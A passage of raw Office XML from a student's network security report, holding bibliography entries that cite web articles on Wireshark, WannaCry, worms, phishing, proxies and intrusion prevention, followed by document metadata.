    <b:Month>July</b:Month>
    <b:Day>6</b:Day>
    <b:YearAccessed>2024</b:YearAccessed>
    <b:MonthAccessed>May</b:MonthAccessed>
    <b:DayAccessed>28</b:DayAccessed>
    <b:URL>https://www.linkedin.com/pulse/wireshark-powerful-tool-cybersecurity-analysis-shanneece-alberts#:~:text=Reconnaissance%3A,%2C%20services%2C%20and%20potential%20vulnerabilities</b:URL>
    <b:RefOrder>4</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Dav231</b:Tag>
    <b:SourceType>DocumentFromInternetSite</b:SourceType>
    <b:Guid>{FAB315E0-6E82-444C-A540-B976DF352917}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Tidmarsh</b:Last>
            <b:First>David</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Network Packet Capturing and Analysis with Wireshark</b:Title>
    <b:Year>2023</b:Year>
    <b:Month>May</b:Month>
    <b:Day>26</b:Day>
    <b:YearAccessed>2024</b:YearAccessed>
    <b:MonthAccessed>April</b:MonthAccessed>
    <b:DayAccessed>28</b:DayAccessed>
    <b:URL>https://www.eccouncil.org/cybersecurity-exchange/penetration-testing/wireshark-packet-capturing-analysis/</b:URL>
    <b:RefOrder>5</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Wir20</b:Tag>
    <b:SourceType>DocumentFromInternetSite</b:SourceType>
    <b:Guid>{494E1837-413F-41F9-A9EF-93819A89E0BA}</b:Guid>
    <b:Author>
      <b:Author>
        <b:Corporate>Wireshark</b:Corporate>
      </b:Author>
    </b:Author>
    <b:Title>CaptureFilters</b:Title>
    <b:Year>2020</b:Year>
    <b:Month>August</b:Month>
    <b:Day>11</b:Day>
    <b:YearAccessed>2024</b:YearAccessed>
    <b:MonthAccessed>April</b:MonthAccessed>
    <b:DayAccessed>28</b:DayAccessed>
    <b:URL>https://wiki.wireshark.org/CaptureFilters</b:URL>
    <b:RefOrder>6</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>AleNA</b:Tag>
    <b:SourceType>DocumentFromInternetSite</b:SourceType>
    <b:Guid>{3AAD764A-AB03-490B-9B73-7F903A722359}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Gilis</b:Last>
            <b:First>Alexander</b:First>
            <b:Middle>S</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>WannaCry ransomware</b:Title>
    <b:Year>N/A</b:Year>
    <b:YearAccessed>2024</b:YearAccessed>
    <b:MonthAccessed>April</b:MonthAccessed>
    <b:DayAccessed>28</b:DayAccessed>
    <b:URL>https://www.techtarget.com/searchsecurity/definition/WannaCry-ransomware</b:URL>
    <b:RefOrder>7</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>MalNA</b:Tag>
    <b:SourceType>DocumentFromInternetSite</b:SourceType>
    <b:Guid>{1C8588F8-E89D-453B-9BCF-CD117BD5D4CE}</b:Guid>
    <b:Author>
      <b:Author>
        <b:Corporate>Malwarebytes</b:Corporate>
      </b:Author>
    </b:Author>
    <b:Title>computer worm</b:Title>
    <b:Year>N/A</b:Year>
    <b:YearAccessed>2024</b:YearAccessed>
    <b:MonthAccessed>April</b:MonthAccessed>
    <b:DayAccessed>28</b:DayAccessed>
    <b:URL>https://www.malwarebytes.com/computer-worm</b:URL>
    <b:RefOrder>8</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Bar23</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{35A3A2BA-B4C9-42FA-A33C-B0B8DFE1AA33}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Lenaerts-Bergmans</b:Last>
            <b:First>Bart</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>WHAT IS A COMPUTER WORM?</b:Title>
    <b:Year>2023</b:Year>
    <b:Month>July</b:Month>
    <b:Day>31</b:Day>
    <b:YearAccessed>2024</b:YearAccessed>
    <b:MonthAccessed>April</b:MonthAccessed>
    <b:DayAccessed>28</b:DayAccessed>
    <b:URL>https://www.crowdstrike.com/cybersecurity-101/malware/computer-worm/</b:URL>
    <b:ProductionCompany>crowdstrike</b:ProductionCompany>
    <b:RefOrder>9</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>MalNA1</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{78486086-CD76-45AD-B1C5-E3E8BF309235}</b:Guid>
    <b:Author>
      <b:Author>
        <b:Corporate>Malwarebytes</b:Corporate>
      </b:Author>
    </b:Author>
    <b:Title>wannacry</b:Title>
    <b:ProductionCompany>Malwarebytes</b:ProductionCompany>
    <b:Year>N/A</b:Year>
    <b:YearAccessed>2024</b:YearAccessed>
    <b:MonthAccessed>April</b:MonthAccessed>
    <b:DayAccessed>28</b:DayAccessed>
    <b:URL>https://www.malwarebytes.com/wannacry</b:URL>
    <b:RefOrder>10</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Ruc18</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{9A5E2459-5BC1-430F-9BC9-AF14E0BC8EC7}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Ruchna Nigam</b:Last>
            <b:First>Kyle</b:First>
            <b:Middle>Wilhoit</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>TeleRAT: Another Android Trojan Leveraging Telegram’s Bot API to Target Iranian Users</b:Title>
    <b:ProductionCompany>Paloaltonetworks</b:ProductionCompany>
    <b:Year>2018</b:Year>
    <b:Month>March</b:Month>
    <b:Day>20</b:Day>
    <b:YearAccessed>2024</b:YearAccessed>
    <b:MonthAccessed>April</b:MonthAccessed>
    <b:DayAccessed>28</b:DayAccessed>
    <b:URL>https://unit42.paloaltonetworks.com/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/</b:URL>
    <b:RefOrder>11</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>CisNA</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{A4B36769-26FA-4D0F-8B26-D83227841CC3}</b:Guid>
    <b:Author>
      <b:Author>
        <b:Corporate>Cisco</b:Corporate>
      </b:Author>
    </b:Author>
    <b:Title>What Is Phishing?</b:Title>
    <b:ProductionCompany>Cisco</b:ProductionCompany>
    <b:Year>N/A</b:Year>
    <b:YearAccessed>2024</b:YearAccessed>
    <b:MonthAccessed>April</b:MonthAccessed>
    <b:DayAccessed>28</b:DayAccessed>
    <b:URL>https://www.cisco.com/c/en/us/products/security/email-security/what-is-phishing.html#:~:text=Phishing%20is%20the%20practice%20of,malware%20on%20the%20victim's%20device.</b:URL>
    <b:RefOrder>12</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>NatNA</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{B3B677B8-B309-41B3-88C6-51EAC2956EA9}</b:Guid>
    <b:Author>
      <b:Author>
        <b:Corporate>National Cyber Security Centre</b:Corporate>
      </b:Author>
    </b:Author>
    <b:Title>Business email compromise: defending your organisation</b:Title>
    <b:Year>N/A</b:Year>
    <b:YearAccessed>2024</b:YearAccessed>
    <b:MonthAccessed>April</b:MonthAccessed>
    <b:DayAccessed>28</b:DayAccessed>
    <b:URL>https://www.ncsc.gov.uk/guidance/business-email-compromise-defending-your-organisation#:~:text=Whaling%20is%20a%20highly%20targeted,a%20wire%20transfer%20of%20funds.</b:URL>
    <b:RefOrder>13</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>mimNA</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{0F9748C6-C27D-4768-BAA3-4B4EB12DEC90}</b:Guid>
    <b:Author>
      <b:Author>
        <b:Corporate>mimecast</b:Corporate>
      </b:Author>
    </b:Author>
    <b:Title>Whaling Phishing Attack</b:Title>
    <b:Year>N/A</b:Year>
    <b:YearAccessed>2024</b:YearAccessed>
    <b:MonthAccessed>April</b:MonthAccessed>
    <b:DayAccessed>28</b:DayAccessed>
    <b:URL>https://www.mimecast.com/content/whaling-phishing-attack/</b:URL>
    <b:RefOrder>14</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>MalNA2</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{317CC40A-408E-45C4-9540-A9DB50BC634C}</b:Guid>
    <b:Author>
      <b:Author>
        <b:Corporate>Malwarebytes</b:Corporate>
      </b:Author>
    </b:Author>
    <b:Title>pharming</b:Title>
    <b:Year>N/A</b:Year>
    <b:YearAccessed>2024</b:YearAccessed>
    <b:MonthAccessed>April</b:MonthAccessed>
    <b:DayAccessed>28</b:DayAccessed>
    <b:URL>https://www.malwarebytes.com/pharming</b:URL>
    <b:RefOrder>15</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>LenNA</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{59CA66C5-B274-4883-978E-D48CE1DE332D}</b:Guid>
    <b:Author>
      <b:Author>
        <b:Corporate>Lenovo</b:Corporate>
      </b:Author>
    </b:Author>
    <b:Title>mesh topology</b:Title>
    <b:Year>N/A</b:Year>
    <b:YearAccessed>2024</b:YearAccessed>
    <b:MonthAccessed>April</b:MonthAccessed>
    <b:DayAccessed>28</b:DayAccessed>
    <b:URL>https://www.lenovo.com/gb/en/glossary/mesh-topology/?orgRef=https%253A%252F%252Fwww.google.com%252F</b:URL>
    <b:RefOrder>16</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Ann08</b:Tag>
    <b:SourceType>JournalArticle</b:SourceType>
    <b:Guid>{692621EA-32DD-491F-B444-81C39717B5DC}</b:Guid>
    <b:Year>2006</b:Year>
    <b:YearAccessed>2024</b:YearAccessed>
    <b:MonthAccessed>April</b:MonthAccessed>
    <b:DayAccessed>28</b:DayAccessed>
    <b:URL>https://www.sciencedirect.com/topics/computer-science/mesh-topology#:~:text=Mesh%20topology%20provides%20an%20inherent,node%20or%20a%20single%20system.</b:URL>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Henmi</b:Last>
            <b:First>Anne</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Pages>211-265</b:Pages>
    <b:Title>Firewall Policies and VPN Configurations</b:Title>
    <b:JournalName>Chapter 5 - Defining a VPN</b:JournalName>
    <b:RefOrder>17</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Placeholder1</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{796DAF17-E83F-4B7B-8933-5BDF0AF5A78A}</b:Guid>
    <b:Author>
      <b:Author>
        <b:Corporate>Malwarebytes</b:Corporate>
      </b:Author>
    </b:Author>
    <b:Title>Antivirus</b:Title>
    <b:Year>N/A</b:Year>
    <b:YearAccessed>2024</b:YearAccessed>
    <b:MonthAccessed>April</b:MonthAccessed>
    <b:DayAccessed>28</b:DayAccessed>
    <b:URL>https://www.malwarebytes.com/antivirus</b:URL>
    <b:RefOrder>18</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>TroNA</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{457E7DC8-06FC-4D14-8785-8261100350D2}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Hunt</b:Last>
            <b:First>Troy</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>FAQs</b:Title>
    <b:Year>N/A</b:Year>
    <b:YearAccessed>2024</b:YearAccessed>
    <b:MonthAccessed>April</b:MonthAccessed>
    <b:DayAccessed>28</b:DayAccessed>
    <b:URL>https://haveibeenpwned.com/FAQs</b:URL>
    <b:RefOrder>19</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Mic22</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{CA18EA10-94E6-4C18-BE68-4E1A10BC619A}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Buckbee</b:Last>
            <b:First>Michael</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>What is a Proxy Server and How Does it Work?</b:Title>
    <b:ProductionCompany>Varonis</b:ProductionCompany>
    <b:Year>2022</b:Year>
    <b:Month>June</b:Month>
    <b:Day>24</b:Day>
    <b:YearAccessed>2024</b:YearAccessed>
    <b:MonthAccessed>April</b:MonthAccessed>
    <b:DayAccessed>28</b:DayAccessed>
    <b:URL>https://www.varonis.com/blog/what-is-a-proxy-server</b:URL>
    <b:RefOrder>20</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>ForNA</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{88B3C014-4C62-46A1-A161-28923A73701B}</b:Guid>
    <b:Author>
      <b:Author>
        <b:Corporate>Fortinet</b:Corporate>
      </b:Author>
    </b:Author>
    <b:Title>What is a Proxy Server? How does it work?</b:Title>
    <b:Year>N/A</b:Year>
    <b:YearAccessed>2024</b:YearAccessed>
    <b:MonthAccessed>April</b:MonthAccessed>
    <b:DayAccessed>28</b:DayAccessed>
    <b:URL>https://www.fortinet.com/uk/resources/cyberglossary/proxy-server</b:URL>
    <b:RefOrder>21</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>VmwNA</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{FBEE18CA-2D9A-4BB6-AE64-762F87EA5262}</b:Guid>
    <b:Author>
      <b:Author>
        <b:Corporate>Vmware</b:Corporate>
      </b:Author>
    </b:Author>
    <b:Title>What is an intrusion prevention system?</b:Title>
    <b:Year>N/A</b:Year>
    <b:YearAccessed>2024</b:YearAccessed>
    <b:MonthAccessed>April</b:MonthAccessed>
    <b:DayAccessed>28</b:DayAccessed>
    <b:URL>https://www.vmware.com/topics/glossary/content/intrusion-prevention-system.html#:~:text=An%20intrusion%20prevention%20system%20(IPS,it%2C%20when%20it%20does%20occur.</b:URL>
    <b:RefOrder>22</b:RefOrder>
  </b:Source>
</b:Sources>
</file>

<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{0E4C6FCA-8AEA-41E5-A5D7-AFD5FFE00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6104</TotalTime>
  <Pages>14</Pages>
  <Words>3504</Words>
  <Characters>19978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Analyse the networks and
discuss its security posturesReport</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>23436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networks and
discuss its security posturesReport</dc:title>
  <dc:subject>ACCA4024</dc:subject>
  <dc:creator>Kara Thomas (2304862)</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Kara Thomas (2304862)</cp:lastModifiedBy>
  <cp:revision>276</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-04-20T13:32:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-05-01T20:08:00Z</dcterms:modified>
</cp:coreProperties>
</file>